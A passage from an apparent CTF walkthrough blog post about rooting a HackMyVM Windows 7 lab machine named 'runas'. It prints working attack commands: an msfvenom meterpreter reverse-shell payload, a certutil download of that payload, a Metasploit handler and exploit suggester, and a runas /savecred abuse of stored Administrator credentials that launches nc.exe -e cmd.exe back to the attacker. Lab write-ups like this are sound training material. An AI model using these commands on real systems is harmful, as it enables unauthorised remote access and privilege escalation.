href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041328.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041328.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608094826565\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041329.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041329.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608094853918\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041330.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041330.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608094954899\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Logged in to the remote desktop successfully. Next, try to get a shell back; first generate a shell locally:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ msfvenom -p windows\/meterpreter\/reverse_tcp lhost=192.168.10.103 lport=4444 -f exe &gt; shell.exe\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 354 bytes\nFinal size of exe file: 73802 bytes\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ updog -p 8888\n[+] Serving \/home\/kali\/temp\/runas...\nWARNING: This is a development server. Do not use it in a production deployment. 
Use a production WSGI server instead.\n * Running on all addresses (0.0.0.0)\n * Running on http:\/\/127.0.0.1:8888\n * Running on http:\/\/192.168.10.103:8888\nPress CTRL+C to quit<\/code><\/pre>\n<p>Then set up the listener in another window:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ msfconsole -q\nmsf6 &gt; use exploit\/multi\/handler\n[*] Using configured payload generic\/shell_reverse_tcp\nmsf6 exploit(multi\/handler) &gt; set payload windows\/meterpreter\/reverse_tcp\npayload =&gt; windows\/meterpreter\/reverse_tcp\nmsf6 exploit(multi\/handler) &gt; options\n\nPayload options (windows\/meterpreter\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  process          yes       Exit technique (Accepted: &#039;&#039;, seh, thread, process, none)\n   LHOST                      yes       The listen address (an interface may be specified)\n   LPORT     4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Wildcard Target\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(multi\/handler) &gt; set lhost 192.168.10.103\nlhost =&gt; 192.168.10.103\nmsf6 exploit(multi\/handler) &gt; run\n[*] Started reverse TCP handler on 192.168.10.103:4444 <\/code><\/pre>\n<p>This time I just used the default port. Then download the file from <code>cmd<\/code> on the remote desktop, using:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041331.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041331.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608100012979\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Switch to English, then download:<\/p>\n<pre><code class=\"language-bash\">certutil -urlcache -split -f http:\/\/192.168.10.103:8888\/shell.exe<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041332.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041332.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608100252453\"  \/><\/div><\/p>\n<p>The download succeeded, and it shows up locally as well:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041333.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  
decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041333.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608100325032\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Then run it:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041334.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041334.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608100401605\" \/><\/div><\/p>\n<p>The shell connected back:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041335.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041335.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608100443994\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>Privilege escalation<\/h2>\n<h3>Information gathering<\/h3>\n<pre><code class=\"language-bash\">meterpreter &gt; shell\nProcess 2448 created.\nChannel 1 created.\nMicrosoft Windows [S\ufffdr\ufffdm 6.1.7601]\nTelif Hakk\ufffd (c) 2009 Microsoft Corporation. T\ufffdm haklar\ufffd sakl\ufffdd\ufffdr.\n\nC:\\Users\\runas&gt;whoami\nwhoami\nrunas-pc\\runas\n\nC:\\Users\\runas&gt;dir\ndir\n C s\ufffdr\ufffdc\ufffds\ufffdndeki birimin etiketi yok.\n Birim Seri Numaras\ufffd: 542C-C630\n\n C:\\Users\\runas dizini\n\n08.06.2025  05:02    &lt;DIR&gt;          .\n08.06.2025  05:02    &lt;DIR&gt;          ..\n06.10.2024  21:38    &lt;DIR&gt;          Contacts\n09.10.2024  18:24    &lt;DIR&gt;          Desktop\n06.10.2024  21:38    &lt;DIR&gt;          Documents\n06.10.2024  21:38    &lt;DIR&gt;          Downloads\n06.10.2024  21:38    &lt;DIR&gt;          Favorites\n06.10.2024  21:38    &lt;DIR&gt;          Links\n06.10.2024  21:38    &lt;DIR&gt;          Music\n06.10.2024  21:38    &lt;DIR&gt;          Pictures\n06.10.2024  21:38    &lt;DIR&gt;          Saved Games\n06.10.2024  21:38    &lt;DIR&gt;          Searches\n08.06.2025  05:02            73.802 shell.exe\n06.10.2024  21:38    &lt;DIR&gt;          Videos\n               1 Dosya           73.802 bayt\n              13 Dizin   21.675.307.008 bayt bo\ufffd\n\nC:\\Users\\runas&gt;cd Desktop\ncd Desktop\n\nC:\\Users\\runas\\Desktop&gt;dir\ndir\n C s\ufffdr\ufffdc\ufffds\ufffdndeki birimin etiketi yok.\n Birim Seri Numaras\ufffd: 542C-C630\n\n C:\\Users\\runas\\Desktop dizini\n\n09.10.2024  18:24    &lt;DIR&gt;          .\n09.10.2024  18:24    &lt;DIR&gt;          ..\n08.10.2024  17:07                31 user.txt\n               1 Dosya               31 bayt\n               2 Dizin   21.675.307.008 bayt bo\ufffd\n\nC:\\Users\\runas\\Desktop&gt;type user.txt\ntype user.txt\nHMV{User_Flag_Was_A_Bit_Bitter}\nC:\\Users\\runas\\Desktop&gt;^Z\nBackground channel 1? 
[y\/N]  y\nmeterpreter &gt; getuid\nServer username: runas-PC\\runas\nmeterpreter &gt; route\n\nIPv4 network routes\n===================\n\n    Subnet           Netmask          Gateway         Metric  Interface\n    ------           -------          -------         ------  ---------\n    0.0.0.0          0.0.0.0          192.168.10.1    10      11\n    127.0.0.0        255.0.0.0        127.0.0.1       306     1\n    127.0.0.1        255.255.255.255  127.0.0.1       306     1\n    127.255.255.255  255.255.255.255  127.0.0.1       306     1\n    192.168.10.0     255.255.255.0    192.168.10.105  266     11\n    192.168.10.105   255.255.255.255  192.168.10.105  266     11\n    192.168.10.255   255.255.255.255  192.168.10.105  266     11\n    224.0.0.0        240.0.0.0        127.0.0.1       306     1\n    224.0.0.0        240.0.0.0        192.168.10.105  266     11\n    255.255.255.255  255.255.255.255  127.0.0.1       306     1\n    255.255.255.255  255.255.255.255  192.168.10.105  266     11\n\nIPv6 network routes\n===================\n\n    Subnet                                   Netmask                                  Gateway                    Metric  Interface\n    ------                                   -------                                  -------                    ------  ---------\n    ::                                       ffff:ffff::                              fe80::4e10:d5ff:fe0a:f900  266     11\n    ::1                                      ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::                         266     1\n    fd00:4c10:d50a:f900::                    ffff:ffff:ffff:ffff:ffff:ffff::          ::                         18      11\n    fd00:4c10:d50a:f900::1002                ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::                         266     11\n    fd00:4c10:d50a:f900:65b5:ae9f:d9e6:7e7a  ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::                         266     11\n    fd00:4c10:d50a:f900:e4d0:6fc2:8968:4806  
ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::                         266     11\n    fe80::                                   ffff:ffff:ffff:ffff:ffff:ffff::          ::                         266     11\n    fe80::5efe:c0a8:a69                      ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::                         266     12\n    fe80::65b5:ae9f:d9e6:7e7a                ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::                         266     11\n    ff00::                                   ff00::                                   ::                         266     1\n    ff00::                                   ff00::                                   ::                         266     11\nmeterpreter &gt; systeminfo\n[-] Unknown command: systeminfo. Did you mean sysinfo? Run the help command for more details.\nmeterpreter &gt; sysinfo\nComputer        : RUNAS-PC\nOS              : Windows 7 (6.1 Build 7601, Service Pack 1).\nArchitecture    : x64\nSystem Language : tr_TR\nDomain          : WORKGROUP\nLogged On Users : 1\nMeterpreter     : x86\/windows\nmeterpreter &gt; pwd\nC:\\Users\\runas\nmeterpreter &gt; background\n[*] Backgrounding session 1...\nmsf6 exploit(multi\/handler) &gt; use post\/multi\/recon\/local_exploit_suggester\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; options\n\nModule options (post\/multi\/recon\/local_exploit_suggester):\n\n   Name             Current Setting  Required  Description\n   ----             ---------------  --------  -----------\n   SESSION                           yes       The session to run this module on\n   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits\n\nView the full module info with the info, or info -d command.\n\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; sessions -l\n\nActive sessions\n===============\n\n  Id  Name  Type                     Information                Connection\n  --  ----  ----                     -----------       
         ----------\n  1         meterpreter x86\/windows  runas-PC\\runas @ RUNAS-PC  192.168.10.103:4444 -&gt; 192.168.10.105:49161 (192.168.10.105)\n\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; set session 1\nsession =&gt; 1\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; run\n[*] 192.168.10.105 - Collecting local exploits for x86\/windows...\n\/usr\/share\/metasploit-framework\/vendor\/bundle\/ruby\/3.3.0\/gems\/logging-2.4.0\/lib\/logging.rb:10: warning: \/usr\/lib\/x86_64-linux-gnu\/ruby\/3.3.0\/syslog.so was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 3.4.0.\nYou can add syslog to your Gemfile or gemspec to silence this warning.\nAlso please contact the author of logging-2.4.0 to request adding syslog into its gemspec.\n[*] 192.168.10.105 - 203 exploit checks are being tried...\n[+] 192.168.10.105 - exploit\/windows\/local\/bypassuac_comhijack: The target appears to be vulnerable.\n[+] 192.168.10.105 - exploit\/windows\/local\/bypassuac_eventvwr: The target appears to be vulnerable.\n[+] 192.168.10.105 - exploit\/windows\/local\/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. 
Vulnerable Windows 7\/Windows Server 2008 R2 build detected!\n[+] 192.168.10.105 - exploit\/windows\/local\/ms10_092_schelevator: The service is running, but could not be validated.\n[+] 192.168.10.105 - exploit\/windows\/local\/ms14_058_track_popup_menu: The target appears to be vulnerable.\n[+] 192.168.10.105 - exploit\/windows\/local\/ms15_051_client_copy_image: The target appears to be vulnerable.\n[+] 192.168.10.105 - exploit\/windows\/local\/ntusermndragover: The target appears to be vulnerable.\n[+] 192.168.10.105 - exploit\/windows\/local\/tokenmagic: The target appears to be vulnerable.\n[*] Running check method for exploit 42 \/ 42\n[*] 192.168.10.105 - Valid modules for session 1:\n============================\n\n #   Name                                                           Potentially Vulnerable?  Check Result\n -   ----                                                           -----------------------  ------------\n 1   exploit\/windows\/local\/bypassuac_comhijack                      Yes                      The target appears to be vulnerable.\n 2   exploit\/windows\/local\/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.\n 3   exploit\/windows\/local\/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. 
Vulnerable Windows 7\/Windows Server 2008 R2 build detected!\n 4   exploit\/windows\/local\/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.\n 5   exploit\/windows\/local\/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.\n 6   exploit\/windows\/local\/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.\n 7   exploit\/windows\/local\/ntusermndragover                         Yes                      The target appears to be vulnerable.\n 8   exploit\/windows\/local\/tokenmagic                               Yes                      The target appears to be vulnerable.\n 9   exploit\/windows\/local\/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.\n 10  exploit\/windows\/local\/agnitum_outpost_acs                      No                       The target is not exploitable.\n 11  exploit\/windows\/local\/always_install_elevated                  No                       The target is not exploitable.\n 12  exploit\/windows\/local\/anyconnect_lpe                           No                       The target is not exploitable. vpndownloader.exe not found on file system\n 13  exploit\/windows\/local\/bits_ntlm_token_impersonation            No                       The target is not exploitable.\n 14  exploit\/windows\/local\/bthpan                                   No                       The target is not exploitable.\n 15  exploit\/windows\/local\/bypassuac_fodhelper                      No                       The target is not exploitable.\n 16  exploit\/windows\/local\/bypassuac_sluihijack                     No                       The target is not exploitable.\n 17  exploit\/windows\/local\/canon_driver_privesc                     No                       The target is not exploitable. 
No Canon TR150 driver directory found\n 18  exploit\/windows\/local\/cve_2020_1048_printerdemon               No                       The target is not exploitable.\n 19  exploit\/windows\/local\/cve_2020_1337_printerdemon               No                       The target is not exploitable.\n 20  exploit\/windows\/local\/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found\n 21  exploit\/windows\/local\/ikeext_service                           No                       The check raised an exception.\n 22  exploit\/windows\/local\/ipass_launch_app                         No                       The check raised an exception.\n 23  exploit\/windows\/local\/lenovo_systemupdate                      No                       The check raised an exception.\n 24  exploit\/windows\/local\/lexmark_driver_privesc                   No                       The check raised an exception.\n 25  exploit\/windows\/local\/mqac_write                               No                       The target is not exploitable.\n 26  exploit\/windows\/local\/ms10_015_kitrap0d                        No                       The target is not exploitable.\n 27  exploit\/windows\/local\/ms13_053_schlamperei                     No                       The target is not exploitable.\n 28  exploit\/windows\/local\/ms13_081_track_popup_menu                No                       Cannot reliably check exploitability.\n 29  exploit\/windows\/local\/ms14_070_tcpip_ioctl                     No                       The target is not exploitable.\n 30  exploit\/windows\/local\/ms15_004_tswbproxy                       No                       The target is not exploitable.\n 31  exploit\/windows\/local\/ms16_016_webdav                          No                       The target is not exploitable.\n 32  exploit\/windows\/local\/ms16_032_secondary_logon_handle_privesc  No                       The target is not exploitable.\n 
33  exploit\/windows\/local\/ms16_075_reflection                      No                       The target is not exploitable.\n 34  exploit\/windows\/local\/ms16_075_reflection_juicy                No                       The target is not exploitable.\n 35  exploit\/windows\/local\/ms_ndproxy                               No                       The target is not exploitable.\n 36  exploit\/windows\/local\/novell_client_nicm                       No                       The target is not exploitable.\n 37  exploit\/windows\/local\/ntapphelpcachecontrol                    No                       The check raised an exception.\n 38  exploit\/windows\/local\/panda_psevents                           No                       The target is not exploitable.\n 39  exploit\/windows\/local\/ppr_flatten_rec                          No                       The target is not exploitable.\n 40  exploit\/windows\/local\/ricoh_driver_privesc                     No                       The target is not exploitable. 
No Ricoh driver directory found\n 41  exploit\/windows\/local\/virtual_box_guest_additions              No                       The target is not exploitable.\n 42  exploit\/windows\/local\/webexec                                  No                       The check raised an exception.\n\n[*] Post module execution completed<\/code><\/pre>\n<h3>Reverse root shell via runas<\/h3>\n<p>Then came a long stretch of digging through information... until I stumbled upon this:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041336.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041336.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608102624799\" style=\"zoom:50%;\" \/><\/div><\/p>\n<blockquote>\n<p><a href=\"https:\/\/www.cnblogs.com\/kqdssheng\/p\/18751119\">https:\/\/www.cnblogs.com\/kqdssheng\/p\/18751119<\/a><\/p>\n<\/blockquote>\n<p><code>winPEAS<\/code> can also be used for enumeration! Learned something new again! An nc binary needs to be uploaded:<\/p>\n<pre><code class=\"language-bash\">meterpreter &gt; shell\nProcess 2512 created.\nChannel 5 created.\nMicrosoft Windows [S\ufffdr\ufffdm 6.1.7601]\nTelif Hakk\ufffd (c) 2009 Microsoft Corporation. 
T\ufffdm haklar\ufffd sakl\ufffdd\ufffdr.\n\nC:\\Users\\runas&gt;whoami \/priv\nwhoami \/priv\n\nAYRICALIK B\ufffdLG\ufffdLER\ufffd\n----------------------\n\nAyr\ufffdcal\ufffdk Ad\ufffd                 A\ufffd\ufffdklama                           Durum\n============================= ================================== =====\nSeShutdownPrivilege           Sistemi kapat                      Etkin\nSeChangeNotifyPrivilege       \ufffdapraz ge\ufffdi\ufffd denetimini atla       Etkin\nSeUndockPrivilege             Bilgisayar\ufffd takma biriminden \ufffd\ufffdkar Etkin\nSeIncreaseWorkingSetPrivilege \ufffd\ufffdlem \ufffdal\ufffd\ufffdma k\ufffdmesini art\ufffdr       Etkin\nSeTimeZonePrivilege           Saat dilimini de\ufffdi\ufffdtir             Etkin\n\nC:\\Users\\runas&gt;cmdkey \/list\ncmdkey \/list\n\nDepolanan ge\ufffderli kimlik bilgileri:\n\n    Hedef: Domain:interactive=RUNAS-PC\\Administrator\n    T\ufffdr: Etki Alan\ufffd Parolas\ufffd \n    Kullan\ufffdc\ufffd: RUNAS-PC\\Administrator\n\nC:\\Users\\runas&gt;certutil -urlcache -split -f http:\/\/192.168.10.103:8888\/nc.exe\ncertutil -urlcache -split -f http:\/\/192.168.10.103:8888\/nc.exe\n****  \ufffdevrimi\ufffdi  ****\n  0000  ...\n  96d8\nCertUtil: -URLCache komutu ba\ufffdar\ufffdyla tamamland\ufffd.\n\nC:\\Users\\runas&gt;dir\ndir\n C s\ufffdr\ufffdc\ufffds\ufffdndeki birimin etiketi yok.\n Birim Seri Numaras\ufffd: 542C-C630\n\n C:\\Users\\runas dizini\n\n08.06.2025  05:37    &lt;DIR&gt;          .\n08.06.2025  05:37    &lt;DIR&gt;          ..\n06.10.2024  21:38    &lt;DIR&gt;          Contacts\n09.10.2024  18:24    &lt;DIR&gt;          Desktop\n06.10.2024  21:38    &lt;DIR&gt;          Documents\n06.10.2024  21:38    &lt;DIR&gt;          Downloads\n06.10.2024  21:38    &lt;DIR&gt;          Favorites\n06.10.2024  21:38    &lt;DIR&gt;          Links\n06.10.2024  21:38    &lt;DIR&gt;          Music\n08.06.2025  05:37            38.616 nc.exe\n06.10.2024  21:38    &lt;DIR&gt;          
Pictures\n06.10.2024  21:38    &lt;DIR&gt;          Saved Games\n06.10.2024  21:38    &lt;DIR&gt;          Searches\n08.06.2025  05:02            73.802 shell.exe\n06.10.2024  21:38    &lt;DIR&gt;          Videos\n               2 Dosya          112.418 bayt\n              13 Dizin   21.674.962.944 bayt bo\ufffd\n\nC:\\Users\\runas&gt;runas \/env \/noprofile \/savecred \/user:Administrator &quot;C:\\Users\\runas\\nc.exe 192.168.10.103 1234 -e cmd.exe&quot;\nrunas \/env \/noprofile \/savecred \/user:Administrator &quot;C:\\Users\\runas\\nc.exe 192.168.10.103 1234 -e cmd.exe&quot;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041337.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041337.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608104017752\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Got the flag!!!<\/p>\n<pre><code class=\"language-bash\">C:\\Users\\runas&gt;cd ..\ncd ..\n\nC:\\Users&gt;dir\ndir\n C s\ufffdr\ufffdc\ufffds\ufffdndeki birimin etiketi yok.\n Birim Seri Numaras\ufffd: 542C-C630\n\n C:\\Users dizini\n\n06.10.2024  22:21    &lt;DIR&gt;          .\n06.10.2024  22:21    &lt;DIR&gt;          ..\n06.10.2024  21:44    &lt;DIR&gt;          Administrator\n06.10.2024  22:21    &lt;DIR&gt;          Classic .NET AppPool\n06.10.2024  22:05    &lt;DIR&gt;          DefaultAppPool\n12.04.2011  18:08    &lt;DIR&gt;          Public\n08.06.2025  05:37    &lt;DIR&gt;          
runas\n               0 Dosya                0 bayt\n               7 Dizin   21.674.926.080 bayt bo\ufffd\n\nC:\\Users&gt;cd Administrator\ncd Administrator\n\nC:\\Users\\Administrator&gt;cd Desktop\ncd Desktop\n\nC:\\Users\\Administrator\\Desktop&gt;dir\ndir\n C s\ufffdr\ufffdc\ufffds\ufffdndeki birimin etiketi yok.\n Birim Seri Numaras\ufffd: 542C-C630\n\n C:\\Users\\Administrator\\Desktop dizini\n\n08.10.2024  18:12    &lt;DIR&gt;          .\n08.10.2024  18:12    &lt;DIR&gt;          ..\n08.10.2024  17:09                24 root.txt\n               1 Dosya               24 bayt\n               2 Dizin   21.674.926.080 bayt bo\ufffd\n\nC:\\Users\\Administrator\\Desktop&gt;type root.txt\ntype root.txt\nHMV{Username_Is_My_Hint}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>runas \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas] \u2514\u2500$ rusts 